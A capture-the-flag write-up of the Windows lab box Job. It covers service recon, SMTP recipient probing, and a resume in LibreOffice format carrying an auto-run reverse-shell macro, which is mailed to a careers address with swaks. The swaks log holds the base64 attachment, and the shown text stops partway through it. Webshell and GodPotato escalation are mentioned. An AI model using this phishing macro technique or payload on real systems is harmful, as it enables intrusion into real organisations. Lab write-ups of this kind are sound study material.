Job

Job is a Windows box with a website saying that they are looking for resumes in Libre Office format. The box is listening on SMTP, so I’ll create a document with a malicious macro and get a shell on mailing it to the careers email address. For root, I’ll drop a webshell into the web directory, and abuse SeImpersonatePrivilege with GodPotato to get system.

Box Info

Medium
Release Date 30 Sep 2025
Retire Date 30 Sep 2025
OS Windows Windows
Non-competitive release: no bloods
Creator xct

Recon

Initial Scanning

nmap finds five open TCP ports, SMTP (25), HTTP (80), SMB (445), RDP (3389), and WinRM (5985):

oxdf@hacky$ nmap -p- -vvv --min-rate 10000 10.129.234.73
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-22 12:05 UTC
...[snip]...
Nmap scan report for 10.129.234.73
Host is up, received echo-reply ttl 127 (0.022s latency).
Scanned at 2026-01-22 12:05:20 UTC for 13s
Not shown: 65530 filtered tcp ports (no-response)
PORT     STATE SERVICE       REASON
25/tcp   open  smtp          syn-ack ttl 127
80/tcp   open  http          syn-ack ttl 127
445/tcp  open  microsoft-ds  syn-ack ttl 127
3389/tcp open  ms-wbt-server syn-ack ttl 127
5985/tcp open  wsman         syn-ack ttl 127

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 13.38 seconds
           Raw packets sent: 131079 (5.767MB) | Rcvd: 13 (556B)
oxdf@hacky$ nmap -p 25,80,445,3389,5985 -sCV 10.129.234.73
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-22 12:06 UTC
Nmap scan report for 10.129.234.73
Host is up (0.022s latency).

PORT     STATE SERVICE       VERSION
25/tcp   open  smtp          hMailServer smtpd
| smtp-commands: JOB, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: Job.local
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: JOB
|   NetBIOS_Domain_Name: JOB
|   NetBIOS_Computer_Name: JOB
|   DNS_Domain_Name: job
|   DNS_Computer_Name: job
|   Product_Version: 10.0.20348
|_  System_Time: 2026-01-22T20:13:00+00:00
| ssl-cert: Subject: commonName=job
| Not valid before: 2025-09-04T13:43:05
|_Not valid after:  2026-03-06T13:43:05
|_ssl-date: 2026-01-22T20:13:42+00:00; +8h06m14s from scanner time.
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: JOB; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 8h06m13s, deviation: 0s, median: 8h06m12s
| smb2-time:
|   date: 2026-01-22T20:13:04
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.30 seconds

Based on the IIS version the host is running Windows post 10 / 2016.

The box shows many of the ports associated with a Windows Client or Server. The hostname is JOB, and it doesn’t seem to be joined to a domain.

All of the ports show a TTL of 127, which matches the expected TTL for Windows one hop away.

The SMTP server is hMailServer.

SMB - TCP 445

netexec shows it’s Windows Server 2022:

oxdf@hacky$ netexec smb 10.129.234.73
SMB         10.129.234.73   445    JOB              [*] Windows Server 2022 Build 20348 (name:JOB) (domain:job) (signing:False) (SMBv1:None)

The guest account is disabled, and anonymous auth doesn’t work:

oxdf@hacky$ netexec smb 10.129.234.73 -u guest -p ''
SMB         10.129.234.73   445    JOB              [*] Windows Server 2022 Build 20348 (name:JOB) (domain:job) (signing:False) (SMBv1:None)
SMB         10.129.234.73   445    JOB              [-] job\guest: STATUS_ACCOUNT_DISABLED 
oxdf@hacky$ netexec smb 10.129.234.73 -u oxdf -p oxdf
SMB         10.129.234.73   445    JOB              [*] Windows Server 2022 Build 20348 (name:JOB) (domain:job) (signing:False) (SMBv1:None)
SMB         10.129.234.73   445    JOB              [-] job\oxdf:oxdf STATUS_LOGON_FAILURE 

I’ll come back when I have creds.

Website - TCP 80

Site

The site just says that they are looking for developers:

image-20260122153047004

It asks for CVs as Libre Office documents, and gives the email address career@job.local.

Tech Stack

The HTTP response headers show the server is IIS with ASP.NET:

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Sun, 07 Nov 2021 13:05:58 GMT
Accept-Ranges: bytes
ETag: "0bf9f34d8d3d71:0"
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Date: Thu, 22 Jan 2026 20:30:17 GMT
Content-Length: 3261

The 404 page is the default IIS 404:

image-20260122153627187

The main page loads as /index.html, suggesting this is a static site.

Directory Brute Force

I’ll run feroxbuster against the site, using a lowercase word list as the server is IIS and with -x aspx because of the X-Powered-By header:

oxdf@hacky$ feroxbuster -u http://10.129.234.73 -w /opt/SecLists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -x aspx

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://10.129.234.73
 🚀  Threads               │ 50
 📖  Wordlist              │ /opt/SecLists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 🔎  Extract Links         │ true
 💲  Extensions            │ [aspx]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET       29l       95w     1245c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404      GET       42l      157w        -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        2l       10w      147c http://10.129.234.73/js => http://10.129.234.73/js/
301      GET        2l       10w      148c http://10.129.234.73/css => http://10.129.234.73/css/
200      GET       59l      147w     1781c http://10.129.234.73/js/scripts.js
301      GET        2l       10w      158c http://10.129.234.73/aspnet_client => http://10.129.234.73/aspnet_client/
200      GET        8l       29w    28898c http://10.129.234.73/assets/favicon.ico
301      GET        2l       10w      151c http://10.129.234.73/assets => http://10.129.234.73/assets/
200      GET    11458l    22050w   213535c http://10.129.234.73/css/styles.css
200      GET       58l      289w     3261c http://10.129.234.73/
403      GET       29l       92w     1233c http://10.129.234.73/assets/
301      GET        2l       10w      155c http://10.129.234.73/assets/img => http://10.129.234.73/assets/img/
301      GET        2l       10w      165c http://10.129.234.73/assets/img/portfolio => http://10.129.234.73/assets/img/portfolio/
301      GET        2l       10w      176c http://10.129.234.73/assets/img/portfolio/thumbnails => http://10.129.234.73/assets/img/portfolio/thumbnails/
200      GET       18l       28w      435c http://10.129.234.73/hello.aspx
404      GET        0l        0w     1245c http://10.129.234.73/catalog_test
301      GET        2l       10w      169c http://10.129.234.73/aspnet_client/system_web => http://10.129.234.73/aspnet_client/system_web/
404      GET        0l        0w     1245c http://10.129.234.73/assets/img/image3
404      GET        0l        0w     1245c http://10.129.234.73/kauai
404      GET        0l        0w     1245c http://10.129.234.73/kill
404      GET        0l        0w     1925c http://10.129.234.73/js/huelva.aspx
404      GET        0l        0w     1245c http://10.129.234.73/kj
404      GET        0l        0w     1245c http://10.129.234.73/css/itn
404      GET        0l        0w     1951c http://10.129.234.73/aspnet_client/system_web/prodimages.aspx
404      GET        0l        0w     1245c http://10.129.234.73/js/ikomunity
404      GET        0l        0w     1949c http://10.129.234.73/aspnet_client/system_web/produkte.aspx
404      GET        0l        0w     1930c http://10.129.234.73/assets/img/ies.aspx
404      GET        0l        0w     1944c http://10.129.234.73/assets/img/portfolio/campers.aspx
404      GET        0l        0w     1245c http://10.129.234.73/js/illustration
404      GET        0l        0w     1939c http://10.129.234.73/aspnet_client/homeowner.aspx
404      GET        0l        0w     1937c http://10.129.234.73/assets/institucionais.aspx
404      GET        0l        0w     1245c http://10.129.234.73/css/itnews
404      GET        0l        0w     1932c http://10.129.234.73/assets/intranett.aspx
404      GET        0l        0w     1921c http://10.129.234.73/js/hv.aspx
404      GET        0l        0w     1937c http://10.129.234.73/aspnet_client/hh_site.aspx
404      GET        0l        0w     1930c http://10.129.234.73/assets/inzerat.aspx
404      GET        0l        0w     1949c http://10.129.234.73/aspnet_client/system_web/torrents.aspx
404      GET        0l        0w     1245c http://10.129.234.73/js/image_gallery
404      GET        0l        0w     1245c http://10.129.234.73/aspnet_client/hotel-search
404      GET        0l        0w     1245c http://10.129.234.73/aspnet_client/roomdetails
404      GET        0l        0w     1933c http://10.129.234.73/assets/ip2country.aspx
404      GET        0l        0w     1922c http://10.129.234.73/js/ies.aspx
404      GET        0l        0w     1245c http://10.129.234.73/assets/jackson
404      GET        0l        0w     1245c http://10.129.234.73/167
404      GET        0l        0w     1245c http://10.129.234.73/aspnet_client/system_web/discuz
404      GET        0l        0w     1954c http://10.129.234.73/aspnet_client/system_web/searchhistory.aspx
404      GET        0l        0w     1245c http://10.129.234.73/js/wls
404      GET        0l        0w     1245c http://10.129.234.73/1771
404      GET        0l        0w     1245c http://10.129.234.73/js/wmt
404      GET        0l        0w     1245c http://10.129.234.73/assets/4200
404      GET        0l        0w     1245c http://10.129.234.73/aspnet_client/system_web/flickr
404      GET        0l        0w     1955c http://10.129.234.73/aspnet_client/system_web/com_virtuemart.aspx
404      GET        0l        0w     1944c http://10.129.234.73/assets/img/portfolio/qualify.aspx
404      GET        0l        0w     1245c http://10.129.234.73/assets/img/%E9%99%A4%E5%80%99%E9%80%89
404      GET        0l        0w     1938c http://10.129.234.73/assets/img/inquiry-pop.aspx
404      GET        0l        0w     1923c http://10.129.234.73/css/326.aspx
404      GET        0l        0w     1926c http://10.129.234.73/assets/238.aspx
404      GET        0l        0w     1245c http://10.129.234.73/aspnet_client/woordenboek
404      GET        0l        0w     1941c http://10.129.234.73/aspnet_client/weihnachten.aspx
400      GET        6l       26w      324c http://10.129.234.73/css/error%1F_log
400      GET        6l       26w      324c http://10.129.234.73/assets/error%1F_log
400      GET        6l       26w      324c http://10.129.234.73/css/error%1F_log.aspx
400      GET        6l       26w      324c http://10.129.234.73/assets/error%1F_log.aspx
400      GET        6l       26w      324c http://10.129.234.73/error%1F_log
400      GET        6l       26w      324c http://10.129.234.73/error%1F_log.aspx
400      GET        6l       26w      324c http://10.129.234.73/assets/img/error%1F_log
400      GET        6l       26w      324c http://10.129.234.73/assets/img/error%1F_log.aspx
400      GET        6l       26w      324c http://10.129.234.73/js/error%1F_log
400      GET        6l       26w      324c http://10.129.234.73/js/error%1F_log.aspx
400      GET        6l       26w      324c http://10.129.234.73/aspnet_client/error%1F_log
400      GET        6l       26w      324c http://10.129.234.73/aspnet_client/error%1F_log.aspx
400      GET        6l       26w      324c http://10.129.234.73/assets/img/portfolio/error%1F_log
400      GET        6l       26w      324c http://10.129.234.73/assets/img/portfolio/error%1F_log.aspx
301      GET        2l       10w      174c http://10.129.234.73/assets/img/portfolio/fullsize => http://10.129.234.73/assets/img/portfolio/fullsize/
400      GET        6l       26w      324c http://10.129.234.73/aspnet_client/system_web/error%1F_log
400      GET        6l       26w      324c http://10.129.234.73/aspnet_client/system_web/error%1F_log.aspx
[####################] - 7m    212713/212713  0s      found:74      errors:881
[####################] - 6m     26584/26584   70/s    http://10.129.234.73/
[####################] - 6m     26584/26584   70/s    http://10.129.234.73/js/
[####################] - 6m     26584/26584   71/s    http://10.129.234.73/css/
[####################] - 6m     26584/26584   71/s    http://10.129.234.73/assets/
[####################] - 6m     26584/26584   70/s    http://10.129.234.73/aspnet_client/
[####################] - 6m     26584/26584   70/s    http://10.129.234.73/assets/img/
[####################] - 6m     26584/26584   70/s    http://10.129.234.73/assets/img/portfolio/
[####################] - 4m     26584/26584   114/s   http://10.129.234.73/aspnet_client/system_web/ 

It does find hello.aspx. That just returns a “Hello World”:

<html xmlns="www.w3.org/1999/xhtml">
<head><title>

</title></head>
<body>
        <form method="post" action="./hello.aspx" id="form1">
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg0NTYxMzIxNWRksO0e53iBgOk1F32mZVsjTztyPJmhrJc1OInj8vzB5Gk=" />

<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="D4124C05" />
        <div>

        Hello World

        </div>
        </form>
</body>
</html>

Even if the page isn’t interesting, it is clearly is an ASPX file.

SMTP - TCP 25

I already have a working account, careers, but I can enumerate for others over SMTP. I’ll connect with telnet, giving EHLO test.local to complete the initial handshake:

oxdf@hacky$ telnet 10.129.234.73 25
Trying 10.129.234.73...
Connected to 10.129.234.73.
Escape character is '^]'.
220 JOB ESMTP
EHLO test.local
250-JOB
250-SIZE 20480000
250-AUTH LOGIN
250 HELP

I can try the VRFY method to verify the career account:

VRFY career
502 VRFY disallowed.

This method is disabled. I can start an email and use the RCPT TO method to test users. career works with job.local and localhost:

MAIL FROM:<0xdf@0xdf.htb>
250 OK
RCPT TO:<career@localhost>
250 OK
RCPT TO:<career@job.local>
250 OK

I’ll try 0xdf (assuming it’s not a user on this box) and junk, and it returns the same:

RCPT TO:<0xdf@localhost>
250 OK
RCPT TO:<asdasdfsdfasdfasdf@localhost>
250 OK

The server isn’t validating recipients.

Shell as jack.black

Create Malicious CV

The website says they want CVs in Libre Office format. I’ll open Writer and make a resume:

image-20260122161533429

Under Tools –> Macros –> Organize Macros –> Basic, I’ll select my doc and click New:

image-20260122161653782

I’ll name it “Shell”, and the resulting popup is the Macro editor. I’ll add a simple reverse shell from revshells.com:

image-20260122165633593

The only trick is to use "" inside double quotes as an escape. So this line ends with AApAA==""") (where "" closes the cmd command, and then " closes the Shell argument). I’ll save this and exit the macro editor. I’ll need to set it to auto execute by going to the Events tab in Tools –> Customize, and finding “Open Document”:

image-20260122162040755

I’ll click “Macro…” and assign my macro:

image-20260122162108432

It shows at the top now:

image-20260122162130384

Shell

I’ll send the resume using swaks:

oxdf@hacky$ swaks --to career@job.local --from 0xdf@0xdf.com --header "Subject: Hire me!" --body "Please review my resume" --attach @resume.odt --server 10.129.234.73
=== Trying 10.129.234.73:25...
=== Connected to 10.129.234.73.
<-  220 JOB ESMTP
 -> EHLO hacky
<-  250-JOB
<-  250-SIZE 20480000
<-  250-AUTH LOGIN
<-  250 HELP
 -> MAIL FROM:<0xdf@0xdf.com>
<-  250 OK
 -> RCPT TO:<career@job.local>
<-  250 OK
 -> DATA
<-  354 OK, send.
 -> Date: Thu, 22 Jan 2026 13:51:43 +0000
 -> To: career@job.local
 -> From: 0xdf@0xdf.com
 -> Subject: Hire me!
 -> Message-Id: <20260122135143.245365@hacky>
 -> X-Mailer: swaks v20240103.0 jetmore.org/john/code/swaks/
 -> MIME-Version: 1.0
 -> Content-Type: multipart/mixed; boundary="----=_MIME_BOUNDARY_000_245365"
 ->
 -> ------=_MIME_BOUNDARY_000_245365
 -> Content-Type: text/plain
 ->
 -> Please review my resume
 -> ------=_MIME_BOUNDARY_000_245365
 -> Content-Type: application/octet-stream; name="resume.odt"
 -> Content-Description: resume.odt
 -> Content-Disposition: attachment; filename="resume.odt"
 -> Content-Transfer-Encoding: BASE64
 ->
 -> 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
 -> MAUv4rfcd7A6jB27mcaAFa85uchYiyBrtc28EToTimvkTVRDROgR4rGYiJT1Bz8y03JtMYQlIeea
 -> NrbRL//BYBiBeBO5RKg5e1+XWtjZTv2Qg3thJYVtONl4W+93uQzTwaqE+tjGsWEGhAos0eL/pIGo
 -> +b5HjsxxnPIJrK9jY8e5DzQfXQYqyTS3/PyMgaqFaiN1YOm4qK3OKfD2IxF7HoJbVjvkbGgm3vn+
 -> nX5GZRH8AGvQaL+xV7E2KF/VYmc25dHTMNrJ+KeajkYzog05qKKfKXC35hpGIlN8h8pW9kxbmrOZ
 -> vDVfRBpOsGE1ng+rWJA59bPrYcCAr+gvxzMqDZyiBw5Cu0A7jQ6jEFdFxYDNYYjVrqbjfCCG+sh3
 -> DaGiTHFxJ2ooam5JZxbHLB4s3mqbahb2cVj2IrFdxzZzB2ZYiP53VDxnHzeATHn7Oasiuw75bxXm
 -> 1QlX8h3Wutk/pDkUCD0grz/BwOTpe3j70HbJpvlb5bxSOT/dtwqF4kbDxAEkqeKa9QQigHWBdUJ9
 -> IzWlYP4zl/qsyTKlCCeNMBVcF7Ceai/GcHZ2oHO/4dxuee03UuVtvx67+hdQSwcI5v1h3MIHAAB/
 -> NgAAUEsDBBQAAAgAABduNlwAAAAAAAAAAAAAAAAcAAAAQ29uZmlndXJhdGlvbnMyL2FjY2VsZXJh
 -> dG9yL1BLAwQUAAAIAAAXbjZcAAAAAAAAAAAAAAAAHwAAAENvbmZpZ3VyYXRpb25zMi9pbWFnZXMv
 -> Qml0bWFwcy9QSwMEFAAACAAAF242XAAAAAAAAAAAAAAAABoAAABDb25maWd1cmF0aW9uczIvdG9v
 -> bHBhbmVsL1BLAwQUAAAIAAAXbjZcAAAAAAAAAAAAAAAAGAAAAENvbmZpZ3VyYXRpb25zMi90b29s
 -> YmFyL1BLAwQUAAAIAAAXbjZcAAAAAAAAAAAAAAAAGAAAAENvbmZpZ3VyYXRpb25zMi9mbG9hdGVy
 -> L1BLAwQUAAAIAAAXbjZcAAAAAAAAAAAAAAAAGgAAAENvbmZpZ3VyYXRpb25zMi9zdGF0dXNiYXIv
 -> UEsDBBQAAAgAABduNlwAAAAAAAAAAAAAAAAaAAAAQ29uZmlndXJhdGlvbnMyL3BvcHVwbWVudS9Q
 -> SwMEFAAACAAAF242XAAAAAAAAAAAAAAAABwAAABDb25maWd1cmF0aW9uczIvcHJvZ3Jlc3NiYXIv
 -> UEsDBBQAAAgAABduNlwAAAAAAAAAAAAAAAAYAAAAQ29uZmlndXJhdGlvbnMyL21lbnViYXIvUEsD
 -> BBQACAgIABduNlwAAAAAAAAAAAAAAAAKAAAAc3R5bGVzLnhtbO1bW4/buhF+768wdJC+ybJ8W9vN
 -> 5jykKHraJAWanOcDWqJsdilRICl7nV/f4U2idfEqu9uil02AAObMcGa+ufAi5v3PjzmdnDAXhBX3
 -> QTydBRNcJCwlxeE++PXbn8JN8POH371nWUYSvEtZUuW4kKGQF4rFBIQLsUuEWMj74ChluYui8/k8
 -> PS+mjB+ib3+PFC2U+FFGgeU+8DSlfdzz2WwRHaIUSRSeCD7/5CQejzLvlYi3222kqY41ZfnA1HEE
 -> HCE+gfXCcYuEkxIsr3ixY0gQsStQjsVOJjtW4sJ5u/O5dxojM5Ixno+VVry+bI7kccCnTfQZiPqf
 -> z58cv4nAWG02Xp4+xlitTgkYDofOMjK/G8/GanoUNMxYmLC8RJLsaVvp+abWMycS8zrQlBQPw4FW
 -> 1DrQHJ1vuhTPIsXjWZLctCRBNKknb1jLilPNlCYRplg5LqJ4GtfprOQgvS1c/FDXSMaqAnIZ6sri
 -> hx9LzIkiIarFdlcz+Ljp8hqdl4rZl5aNPU8Ky5Zmlo1PMZCb1zoRhP52jm0jzeRHcKwuxQsdyTc0
 -> 5Yt0vPgi9WV5KW/YuYo4LhmXdTBOh9GhOB0GKiE5Ij46KJr5OirKwKfgvS5hDfboNEAte3Ms0Vhh
 -> xevLUvaMgrAdy5vBn7Ko8j3mo+MNS0inKjKCqcuYGrxeSxgLcxGSAjoTK3eetJnOSnqL5iL44FbI
 -> jMHqmKEEhylOqPjw3thRD0/Mb6X2PvhEwCmNyOQrKmBZgvxxrDmhl/vg96hk4g8tPjMYTK6mVvzh
 -> ARfgB3QvcSZCXHGURCaw4JwQJ7oKo/GmwZTZKNsU4wjjOMtR8RLjvjDJNBKTj3/56+Trx0Hj2oxj
 -> kLsIifPXse6P+IQKdAC5ERY2zKPj+wxD4le35JXwUrkzLpwe56vZFw2Vrx03+13nR4ozVFG7C3Yz
 -> W0sPHJVHkgSO1/4OS+glmEsCu2blnZCcPWBYLCiDtvbTYrleoWUwUQsd9BpKa8rdfJslUH4Z251h
 -> qpCVUnedgoXqtxURR5SycwjWCizDx/tgNo3jTUyKXvqlS5ew4oSwwcKhKFECa214ZJx8Z6ojGu54
 -> eYv7pHxLenihOY+et8PbN6uBVW0cFUfOUkghykO5r2NMwdMzkcfQbIQyRIWXhCXiSAflKiSapPhD
